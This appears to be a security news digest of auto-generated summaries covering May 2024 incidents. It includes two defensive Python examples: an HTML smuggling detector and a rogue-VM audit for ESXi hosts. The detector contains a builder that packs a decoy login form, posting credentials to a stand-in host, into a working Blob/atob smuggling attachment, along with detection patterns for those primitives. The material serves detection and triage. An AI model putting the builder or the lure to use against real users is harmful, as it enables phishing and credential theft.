Daily Brief

Article summaries below are auto-generated.

Total articles found: 12718


2024-05-27 12:17:04 thehackernews CYBERCRIME Moroccan Cybercrime Group Exploits Gift Card Protocols for Profit
Storm-0539, also tracked as Atlas Lion, is a Morocco-based cybercrime group running gift card fraud that Microsoft says has netted up to $100,000 a day at some targeted companies. The group uses email and SMS phishing to obtain credentials and defeat multi-factor authentication, then abuses the victim's gift card systems directly. Targets include large retailers, luxury brands and fast-food chains; stolen cards are resold at a discount on underground markets. The group has shifted from deploying malware on point-of-sale devices to abusing cloud-based gift card services, carrying out extensive reconnaissance inside victims' cloud environments once it has a foothold. Observed tactics include issuing fraudulent gift cards, changing the email address associated with unredeemed gift cards, and abusing internal company mailing lists to distribute phishing. Storm-0539 sends phishing from compromised legitimate email accounts to lend authenticity and registers fake non-profit accounts on cloud platforms to stay under the radar. Microsoft advises monitoring for suspicious logins and hardening authentication flows.
2024-05-27 11:51:23 thehackernews CYBERCRIME Exploring Efficient Phishing Attack Protections and Solutions
Phishing attacks are increasingly commonplace due to shifts to cloud technology, inadequate password management, and advances in webpage design. Security measures like email protection, firewall implementation, and workforce education have been deployed but phishing remains a significant threat. The LayerX report provides insights into current phishing trends and evaluates organizational defenses against such cyber threats. The study suggests implementing a browser security platform to effectively block phishing attacks that bypass other security layers. This platform acts directly at the potential point of attack—the browser—by detecting malicious pages, preventing password theft, and terminating unsafe sessions. It also offers deep session inspection, allowing for real-time surveillance, monitoring, and enforcement of security policies. LayerX's analysis highlights the necessity for IT and security professionals to incorporate browser-based security technologies into their phishing defense strategies.
2024-05-27 09:03:22 thehackernews CYBERCRIME Phishing Techniques Evolve: Cloudflare Workers and HTML Smuggling
Phishing campaigns are increasingly hosting adversary-in-the-middle (AitM) phishing sites on Cloudflare Workers, targeting credentials for Microsoft and Gmail accounts among others. Netskope found the campaigns mainly hit technology, financial services and banking organizations across Asia, North America and Southern Europe. The attackers use HTML smuggling: the phishing page is carried inside the HTML attachment as an encoded string and reconstructed by the victim's browser with JavaScript, so no recognizable malicious page or file crosses the network where gateway and proxy scanners would see it. The resulting page asks the victim for Microsoft credentials to view a supposed PDF and relays them to the real service, capturing both the password and the multi-factor authentication (MFA) code. The campaigns run a modified version of an open-source Cloudflare AitM toolkit to intercept and harvest data from victims' web requests. Separately, criminal use of generative AI (GenAI) is growing, helping attackers write more convincing phishing emails and build malicious attachments. Researchers have also reported a rise in DNS tunneling within phishing campaigns, used to track victim interactions and scan for network weaknesses. The growing sophistication of phishing tooling calls for defenses that inspect content at the browser and endpoint rather than relying on network scanning alone.
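The HTML smuggling pattern described above, as an added example that is not code from the Netskope report or from any phishing kit: the scanner below looks for the browser-side reconstruction primitives (atob, Blob, URL.createObjectURL, the string-reversal trick) and tries to decode any long Base64 literal so an analyst can see what the attachment would assemble. The "attachment" is built from a harmless constructed decoy page so the scanner runs offline; indicator names, the 64-character Base64 threshold and the scoring rule are this example's own choices.

```python
"""Detect and unpack HTML smuggling in an HTML e-mail attachment (added example)."""
import base64
import re

# Constructed decoy page standing in for the smuggled credential-harvesting form.
INNER_PAGE = (
    "<html><body><form action='https://collector.example/login' method='post'>"
    "<input name='user'><input name='pass' type='password'>"
    "<button>Open PDF</button></form></body></html>"
)
BENIGN_HTML = "<html><body><a href='report.pdf'>Download report</a></body></html>"


def build_sample(inner_html: str, reverse: bool = False) -> str:
    """Build a constructed smuggling attachment around inner_html.

    Mirrors the usual pattern: a Base64 string is decoded with atob(), wrapped in
    a Blob and opened via URL.createObjectURL, so the page is assembled inside the
    browser. reverse=True stores the string reversed, a trick used against naive
    Base64 scanners.
    """
    blob = base64.b64encode(inner_html.encode()).decode()
    unreverse = ""
    if reverse:
        blob = blob[::-1]
        unreverse = ".split('').reverse().join('')"
    return (
        "<html><body><p>Loading secure document...</p><script>\n"
        f'var d = "{blob}"{unreverse};\n'
        "var bytes = Uint8Array.from(atob(d), c => c.charCodeAt(0));\n"
        "var blob = new Blob([bytes], {type: 'text/html'});\n"
        "location.href = URL.createObjectURL(blob);\n"
        "</script></body></html>"
    )


# Browser-side primitives that turn an embedded string into a page or file.
INDICATORS = {
    "atob": re.compile(r"\batob\s*\("),
    "blob_ctor": re.compile(r"new\s+Blob\s*\("),
    "object_url": re.compile(r"URL\.createObjectURL\s*\("),
    "ms_save_blob": re.compile(r"msSaveOrOpenBlob"),
    "reverse_trick": re.compile(r"\.split\(['\"]{2}\)\.reverse\(\)\.join\(['\"]{2}\)"),
    "download_attr": re.compile(r"\.download\s*=|\bdownload\s*=\s*['\"]"),
    "typed_array": re.compile(r"Uint8Array"),
}
# Quoted Base64 literal of at least 64 characters, padding allowed at either end
# (leading padding is what a reversed blob looks like).
B64_LITERAL = re.compile(r"""['"](={0,2}[A-Za-z0-9+/]{64,}={0,2})['"]""")


def classify(data: bytes) -> str:
    """Rough file-type guess for a decoded payload."""
    if data.startswith(b"MZ"):
        return "pe"
    if data.startswith(b"%PDF"):
        return "pdf"
    if data.startswith(b"PK\x03\x04"):
        return "zip"
    head = data[:2048].lower()
    if b"<html" in head or b"<form" in head or b"<script" in head:
        return "html"
    return "unknown"


def _decode_candidates(literal: str):
    """Try the literal as-is and reversed; return (encoding, kind, bytes) or None."""
    for encoding, text in (("plain", literal), ("reversed", literal[::-1])):
        try:
            data = base64.b64decode(text, validate=True)
        except ValueError:  # not valid Base64 in this orientation
            continue
        kind = classify(data)
        if kind != "unknown":
            return encoding, kind, data
    return None


def scan_html(html: str) -> dict:
    """Report smuggling indicators and any decodable embedded payloads."""
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(html))
    payloads = []
    for literal in B64_LITERAL.findall(html):
        found = _decode_candidates(literal)
        if found:
            encoding, kind, data = found
            payloads.append({"encoding": encoding, "kind": kind,
                             "size": len(data), "preview": data[:40]})
    # Heuristic: a decodable embedded document plus any reconstruction primitive,
    # or three or more primitives even if the payload could not be decoded.
    suspicious = (bool(payloads) and len(hits) >= 1) or len(hits) >= 3
    return {"indicators": hits, "payloads": payloads, "suspicious": suspicious}


if __name__ == "__main__":
    for label, doc in (("plain", build_sample(INNER_PAGE)),
                       ("reversed", build_sample(INNER_PAGE, reverse=True)),
                       ("benign", BENIGN_HTML)):
        print(label, scan_html(doc))
```

The decoded preview is what makes this useful in triage: a `kind` of `html` with a form inside an attachment that claims to be a PDF is the AitM lure itself, while `pe` or `zip` points at a dropper. Real kits also XOR or split the blob across several variables, so treat an undecodable literal next to three or more primitives as suspicious rather than clean.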
2024-05-27 06:35:47 thehackernews NATION STATE ACTIVITY Pakistan-Linked Hackers Target Indian Government and Defense
Transparent Tribe, a group linked to Pakistan, has been attacking Indian government and defense organizations. The campaigns deliver malware written in Python, Golang and Rust, mostly through spear-phishing. BlackBerry Research reports the activity ran from late 2023 to April 2024 and targeted three key firms in Bengaluru involved with the Department of Defence Production. Tooling includes several RATs and information gatherers such as GLOBSHELL and PYSHELLFOX, which have been adapted over the years to evade detection and improve effectiveness. The malware abuses reputable online services such as Discord and Google Drive for command-and-control communications. Observed delivery methods include malicious links, ZIP archives and ISO images, with payloads aimed at Linux, reflecting the Indian government's reliance on Linux-based systems. The persistent activity points to an ongoing espionage-driven risk to India's national security infrastructure.
2024-05-27 03:02:11 theregister DATA BREACH Major Pharma Companies Hit by Cencora Data Breach Incident
In February 2024, Cencora, a major US drug wholesaler formerly known as AmerisourceBergen, suffered a data breach affecting more than a dozen large pharmaceutical companies. Affected firms including Bayer, GlaxoSmithKline and Novartis have begun filing breach notices with the California Attorney General, attributing the loss of personal and health-related information to the Cencora incident. Compromised data may include names, addresses, dates of birth, health diagnoses and prescription details; there is currently no evidence that the stolen data has been misused or published. The number of individuals affected remains unclear because companies are not required to report that figure to the California Attorney General. Cencora disclosed the breach in a February SEC filing and said it had not materially affected operations or financial condition, though the full consequences are still being assessed. In other news from the same roundup: Chrome has seen further zero-day exploitation, critical flaws in VMware storage controllers could allow denial of service or code execution, and the U.S. Environmental Protection Agency (EPA) reported critical cybersecurity failures at more than 70% of the U.S. water systems it inspected, underscoring the exposure of national infrastructure.
2024-05-26 14:20:11 bleepingcomputer MALWARE Hackers Use Minesweeper Game Clone to Deploy Malware in Financial Sector
Attackers are using a Python clone of the Minesweeper game to hide malicious code in campaigns against financial organizations in Europe and the U.S. The lure is a phishing email impersonating a medical center that leads recipients to download a malware-laden .SCR file. The file contains legitimate Minesweeper code alongside a large Base64-encoded string; decoding it yields scripts that install SuperOps RMM, a legitimate remote management tool abused here to obtain unauthorized remote access. At least five breaches of financial and insurance institutions have been linked to this tactic. The game code exists only to make the file look benign to analysts and automated scanners. SuperOps RMM binaries or network activity on systems where the organization does not use that product should be treated as indicators of compromise. Ukraine's CERT-UA attributes the activity to the actor it tracks as 'UAC-0188' and has published additional indicators of compromise for defenders.
2024-05-25 15:18:50 bleepingcomputer MALWARE Malvertising Campaign Targets New Arc Browser Windows Launch
A malvertising campaign abused Google Ads around the Windows launch of the Arc web browser to push trojanized installers. The ads looked legitimate and used URLs resembling the genuine Arc site; clicking them redirected users to typo-squatted domains serving the malicious installers. Those installers fetched additional payloads, including a file named 'bootstrap.exe' that drove the subsequent malicious activity. Malwarebytes also observed a second infection path involving a Python-based executable that injected into system processes to run further commands. The final payload is believed to be an information stealer, though it has not been definitively identified. Because the genuine Arc browser was installed correctly, the malicious activity ran unnoticed in the background. The report underlines how reliably high-profile software launches are exploited for malware distribution and the importance of downloading only from the vendor's verified site.
2024-05-25 14:12:32 bleepingcomputer CYBERCRIME Indian Hacker Steals $37 Million Using Phony Coinbase Site
An Indian man, Chirag Tomar, pleaded guilty to wire fraud conspiracy involving over $37 million stolen via a counterfeit Coinbase Pro website. Tomar was apprehended at Atlanta airport on December 20, 2023, following joint investigations led by the U.S. Secret Service and the FBI in Nashville. The fraudulent activity began in June 2021 when Tomar, along with accomplices, set up a fake website mimicking Coinbase Pro to phish for user credentials. Victims were deceived into entering their login details and two-factor authentication codes into the fake site, thinking they were accessing their real Coinbase accounts. Fraudsters also tricked victims into installing remote desktop software under the guise of Coinbase customer support, gaining direct access to their computers and subsequently their genuine Coinbase accounts. The scammers converted the stolen cryptocurrency into various forms or cash and distributed the proceeds among themselves. Proceeds from the criminal activity were used by Tomar to fund an extravagant lifestyle, purchasing luxury cars, high-end watches, and international trips. Tomar faces up to 20 years in prison and a fine of $250,000, with his sentencing date pending.
2024-05-25 13:31:45 bleepingcomputer DATA BREACH Major Data Breach at Cencora Impacts Multiple Pharma Firms
In February 2024, Cencora, a major pharmaceutical services provider, experienced a significant data breach impacting the personal information of US patients. Eleven major pharmaceutical companies, later revised to include three additional firms, were affected by the breach due to their partnership with Cencora. The breach was first disclosed by Cencora in a Form 8-K filing with the SEC, noting unauthorized access to their systems and data exfiltration. Information exposed includes full names, addresses, health diagnoses, medications, and prescriptions. There's no current evidence that the stolen data has been publicly disclosed or used for fraudulent purposes. Cencora has offered two years of free identity protection and credit monitoring services to affected individuals through Experian. The company has not publicly revealed the extent of the breach or the number of individuals affected, and has declined further comment beyond a recent news release.
2024-05-25 09:17:39 thehackernews CYBERCRIME Critical Security Flaw Detected in AI Service Could Expose Sensitive Data
Security researchers found a critical flaw in the AI-as-a-service provider Replicate that could have exposed customers' AI models and sensitive data. The issue stemmed from the platform's model packaging format, which allowed a maliciously crafted model to execute arbitrary code when the platform ran it. The researchers demonstrated remote code execution by uploading such a model and found they were running with elevated privileges inside the platform. From there they reached an internal Redis server over a TCP connection and injected rogue tasks into the queue, which could have altered other customers' model outputs and so compromised the integrity of their results, a cross-tenant attack. The same access could expose proprietary models, sensitive data and personally identifiable information used in training. The flaw was responsibly disclosed to Replicate in January 2024 and has since been fixed, with no evidence of exploitation in the wild. The case shows why AI platforms must treat uploaded models as untrusted code and isolate tenants accordingly.
2024-05-24 23:28:11 theregister MISCELLANEOUS Political Consultant Indicted for Anti-Biden Deepfake Robocall
Steven Kramer, a 54-year-old political consultant from New Orleans, has been indicted on 13 felony counts of voter suppression and 13 misdemeanor counts related to impersonation of candidate Joe Biden. Kramer created a deepfake robocall using AI to clone Biden's voice and used caller ID spoofing; he spent $500 on the complete operation and notably $150 on the deepfake component. The robocall was aimed at suppressing voter turnout in the New Hampshire Democratic primary by discouraging Biden supporters from voting, purportedly to boost House Rep Dean Phillips' (D-MN) candidacy. More than 5,000 voters received the deceptive call, which Kramer claimed was a significant political tactic for a low budget. The FCC has proposed a first-of-its-kind $6 million fine against Kramer for election misinformation and unlawful call spoofing, marking a major enforcement effort in tackling deceptive political communications. The case highlights regulatory responses to new forms of election interference, including the misuse of artificial intelligence and digital communications technologies. Both the New Hampshire Attorney General and the FCC have taken actions signaling strong deterrent measures against anyone considering similar tactics to influence election outcomes.
2024-05-24 22:37:09 bleepingcomputer CYBERCRIME Hacker Exposes and Leaks Data from Spyware App pcTattletale
A hacker defaced the website of pcTattletale, a spyware tool found running at Wyndham hotels, and leaked its database and source code. Vice had earlier reported that pcTattletale, marketed as child and employee monitoring software, was leaking real-time screenshots from infected devices. Security researcher Eric Daigle found a severe API vulnerability that allowed anyone to retrieve screenshots from any device running the spyware. The developer ignored repeated attempts at contact, so the flaw went unfixed. The hacker used a different vulnerability, exploited with a Python script, to extract the service's AWS credentials and gain access to its backend data. The leak comprises 20 archives of source code and data. Microsoft classifies pcTattletale as a potential threat because it can record keystrokes and screen images, exposing sensitive user information. The developer, Bryan Fleming, has not publicly responded to the incident.
2024-05-24 22:26:44 theregister CYBERCRIME Best Buy, Microsoft Top List of Impersonated Companies in Scams
Best Buy and its Geek Squad were the most impersonated organizations in scams for 2023, with over 52,000 reports. Microsoft impersonators garnered the highest financial gain, stealing approximately $60 million. Amazon and PayPal were also heavily targeted, leading to losses of $19 million and $16 million respectively. Scammers used various communication methods, with phone and email being the most common, but social media scams proved to be the most costly. Popular payment methods among scammers included cryptocurrency, bank transfers, and gift cards. The Federal Trade Commission (FTC) advises the public to be cautious with payment demands, especially those specifying cryptocurrencies or gift cards. Overall, the top ten most impersonated companies accounted for significant financial losses, with figures ranging from $2 million to $60 million.
2024-05-24 20:34:46 theregister CYBERCRIME Supply Chain Attack Targets Courtroom AV Software
Courtroom audio-visual software from Justice AV Solutions (JAVS), deployed in more than 10,000 courtrooms, was compromised in a suspected supply chain attack. Rapid7's research team found the backdoor after an alert from a customer's managed detection and response (MDR) service. The affected release, JAVS Viewer v8.3.7, shipped with a malicious binary, fffmpeg.exe, associated with known malware families and signed by an entity other than JAVS. The malware can evade anti-malware protections, collect system information, download additional payloads and steal browser credentials. Rapid7 traced the initial alert to an earlier finding by another researcher and confirmed that the trojanized installer was being served from JAVS' official download page. Rapid7 advises fully re-imaging affected endpoints and resetting all credentials stored or used on them, since removing the installer alone is insufficient. JAVS says it is working with authorities, reviewing its release and code-signing process, and that its technicians validate installations. The full impact is unknown while investigations continue.
2024-05-24 16:35:23 thehackernews CYBERCRIME Hackers Use Rogue VMs in Sophisticated MITRE Cyber Attack
Attackers breached MITRE Corporation by chaining two zero-day vulnerabilities in Ivanti Connect Secure (ICS). Once inside, they created rogue virtual machines (VMs) in MITRE's VMware environment to evade detection and keep persistent access. The group, tracked as UNC5221, used compromised administrative credentials to control the VMware infrastructure and deploy backdoors and web shells. Tooling included a Python-based tunneling tool for SSH connections, a Golang backdoor named BRICKSTORM, and the BEEFLUSH and BUSHWALK web shells. The attackers also made API calls from standard VMware accounts to map network drives, blending in with normal administrative traffic. MITRE has recommended countermeasures such as enabling secure boot and has published PowerShell scripts to help identify and remove hidden VMs. The incident shows that hypervisor-level persistence escapes defenses that only watch the guests, and that VMware inventory and host configuration need to be monitored directly.
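One concrete check for the rogue-VM scenario above, as an added example that is not MITRE's published scripts: a VM registered directly on an ESXi host and never registered with vCenter appears in the host's own `vim-cmd vmsvc/getallvms` listing but not in vCenter's inventory. The script parses a captured `getallvms` listing, compares it with a list of VM names exported from vCenter, and also flags VMs whose configuration file sits in a dot-prefixed (hidden) directory. Both inputs below are constructed samples in the usual output layout; the VM names, datastores and the hidden-directory rule are this example's assumptions.

```python
"""Find VMs a hypervisor host knows about but vCenter does not (added example)."""
import re

# Constructed sample of `vim-cmd vmsvc/getallvms` run on one ESXi host.
ESXI_GETALLVMS = """\
Vmid   Name                  File                                         Guest OS        Version  Annotation
1      web-prod-01           [datastore1] web-prod-01/web-prod-01.vmx     ubuntu64Guest   vmx-19
5      db-prod-02            [datastore1] db-prod-02/db-prod-02.vmx       rhel8_64Guest   vmx-19
12     vmware-tools-update   [datastore2] .hidden/vmware-tools-update.vmx otherGuest      vmx-17
"""

# Constructed vCenter inventory export (VM display names), assumed to be the
# authoritative list of VMs that administrators deliberately created.
VCENTER_INVENTORY = ["web-prod-01", "db-prod-02"]

# One data row: numeric Vmid, a name that may contain spaces (matched lazily up
# to the "[datastore]" token), the config path, guest OS and hardware version.
ROW = re.compile(
    r"^(?P<vmid>\d+)\s+(?P<name>.+?)\s+\[(?P<datastore>[^\]]+)\]\s+"
    r"(?P<path>\S+)\s+(?P<guest>\S+)\s+(?P<version>\S+)"
)


def parse_getallvms(text: str) -> list[dict]:
    """Parse getallvms output into dicts; the header and blank lines do not match."""
    return [m.groupdict() for line in text.splitlines() if (m := ROW.match(line))]


def audit_host(getallvms_text: str, vcenter_names) -> list[dict]:
    """Return host-registered VMs that look rogue, with the reasons for each."""
    known = {name.lower() for name in vcenter_names}
    findings = []
    for vm in parse_getallvms(getallvms_text):
        reasons = []
        if vm["name"].lower() not in known:
            reasons.append("not in vCenter inventory")
        # A config file under a dot-prefixed directory is hidden from casual
        # datastore browsing; legitimate VMs are not normally placed there.
        if any(part.startswith(".") for part in vm["path"].split("/")):
            reasons.append("config file under a hidden (dot-prefixed) directory")
        if reasons:
            findings.append({
                "vmid": vm["vmid"],
                "name": vm["name"],
                "config": f"[{vm['datastore']}] {vm['path']}",
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for finding in audit_host(ESXI_GETALLVMS, VCENTER_INVENTORY):
        print(f"{finding['vmid']:>4}  {finding['name']:<24} {finding['config']}")
        for reason in finding["reasons"]:
            print(f"      - {reason}")
```

Run this against every host, not just the ones vCenter reports as healthy, and pull the `getallvms` listing over SSH to the host rather than through vCenter, since the point is to see what vCenter cannot. A clean result is not proof of absence: an attacker with host-level access can also unregister a VM and run it from the command line, so pair this check with MITRE's recommended secure boot setting and with monitoring of direct ESXi logins.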